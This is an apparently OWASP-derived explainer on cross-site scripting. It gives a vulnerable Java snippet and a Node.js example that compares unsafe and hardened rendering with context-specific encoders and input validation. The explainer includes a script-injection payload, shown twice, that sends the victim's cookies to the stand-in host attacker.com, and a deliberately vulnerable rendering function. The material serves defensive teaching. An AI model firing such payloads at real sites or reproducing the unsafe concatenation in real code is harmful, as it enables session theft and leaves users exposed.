Description

XSS flaws occur whenever an application takes user-supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser, where it runs with the privileges of the vulnerable site and can hijack user sessions, deface web sites, possibly introduce worms, and so on.

Examples

The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:

(String) page += "<input name='creditcard' type='TEXT' value='" + request.getParameter("CC") + "'>";

The attacker modifies the 'CC' parameter in their browser to:

'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'

The leading '> closes the value attribute and the <input> tag, so the browser parses the injected <script> element as part of the page. The script sends the victim's session ID (along with any other cookie the site has not marked HttpOnly) to the attacker's website, allowing the attacker to hijack the user's current session.

Mitigation

Preventing XSS requires keeping untrusted data separate from active browser content.

  • The preferred option is to properly escape all untrusted data (any user-submitted data) based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications unless their UI framework does this for them, and even then they should confirm that the framework escapes for the context actually used: automatic escaping for HTML bodies does not make a value safe inside a JavaScript string or a URL.
  • Positive or "whitelist" input validation with appropriate canonicalization and decoding is also recommended as it helps protect against XSS, but it is not a complete defense, as many applications require special characters in their input. Such validation should, as far as possible, first decode any encoded input, then validate the length, characters, format, and any business rules on that data before accepting it.
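The vulnerable snippet from the Examples section beside its hardened form, together with the per-context output encoders and the decode-then-validate allow-list check that the Mitigation section calls for, as an added example written for this page (not code from the original or from OWASP). It is Node.js JavaScript with no dependencies; the function names, the constructed payload and the use of a Luhn check as the "business rule" are assumptions made for illustration.

```javascript
// Added example for this page (not OWASP's code): the vulnerable attribute-context
// concatenation beside a hardened version, one output encoder per HTML context, and
// positive (allow-list) input validation that decodes before it checks. Node.js, no
// dependencies. All function names and the sample payload are assumptions.

// Constructed attacker input, matching the page's example: the leading '> closes the
// value attribute and the <input> tag so the <script> element is parsed as HTML.
const PAYLOAD =
  "'><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>'";

// VULNERABLE: untrusted data concatenated straight into a single-quoted attribute.
function buildPageVulnerable(cc) {
  return "<input name='creditcard' type='TEXT' value='" + cc + "'>";
}

// --- Output encoders, one per HTML context ------------------------------------

// Element body: the characters that can change HTML structure.
const HTML_ESCAPE = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
function escapeHtml(s) {
  return String(s).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPE[c]);
}

// Quoted attribute value: encode every non-alphanumeric code point as &#xHH;, which
// is safe whether the attribute is single-quoted, double-quoted or unquoted.
function escapeHtmlAttr(s) {
  return String(s).replace(/[^A-Za-z0-9]/gu, (c) => "&#x" + c.codePointAt(0).toString(16) + ";");
}

// Inside a quoted JavaScript string literal: \xHH / \uHHHH so that neither a quote
// nor "</script>" can terminate the string or the script block.
function escapeJsString(s) {
  return String(s).replace(/[^A-Za-z0-9]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 0x100 ? "\\x" + code.toString(16).padStart(2, "0")
                        : "\\u" + code.toString(16).padStart(4, "0");
  });
}

// URL used as a link target: parse it and allow only http(s), which rejects
// javascript: and data: URLs. Relative URLs are rejected too (they do not parse
// without a base); for attacker-supplied redirect targets that is the safe default.
function safeUrl(raw) {
  let u;
  try { u = new URL(String(raw)); } catch { return null; }
  return (u.protocol === "http:" || u.protocol === "https:") ? u.href : null;
}

// HARDENED: same markup, untrusted value encoded for the attribute context.
function buildPageSafe(cc) {
  return "<input name='creditcard' type='TEXT' value='" + escapeHtmlAttr(cc) + "'>";
}

// One untrusted value landing in three different contexts, each with its own encoder.
function renderConfirmation(user, cc, returnUrl) {
  const href = safeUrl(returnUrl) || "/";
  return "<p>Thanks, " + escapeHtml(user) + ".</p>\n" +
    buildPageSafe(cc) + "\n" +
    "<a href=\"" + escapeHtmlAttr(href) + "\">Back</a>\n" +
    "<script>var user = \"" + escapeJsString(user) + "\";</script>";
}

// --- Positive input validation (second line of defense, not a replacement) ----

// Luhn check: the kind of business rule the page says should run after decoding.
function luhnOk(digits) {
  let sum = 0, dbl = false;
  for (let i = digits.length - 1; i >= 0; i--) {
    let d = digits.charCodeAt(i) - 48;
    if (dbl) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
    dbl = !dbl;
  }
  return sum % 10 === 0;
}

// Decode first, then check length, character class, format and the business rule.
// Returns the canonical digit string or null; the caller must still encode it on output.
function validateCreditCard(raw) {
  let decoded;
  try { decoded = decodeURIComponent(String(raw)); } catch { return null; } // malformed %-encoding
  const digits = decoded.replace(/[ -]/g, "");       // tolerate space/dash separators
  if (!/^[0-9]{13,19}$/.test(digits)) return null;   // length + characters + format
  return luhnOk(digits) ? digits : null;             // business rule
}

console.log(buildPageVulnerable(PAYLOAD));   // injected <script> survives intact
console.log(buildPageSafe(PAYLOAD));         // every metacharacter is now &#x..;
console.log(validateCreditCard("4111%201111%201111%201111"), validateCreditCard(PAYLOAD));
```

Note that validation returns the canonical value but does not make it safe to emit: a card number passes validation and is still encoded by buildPageSafe on the way out, which is the separation the Mitigation section describes.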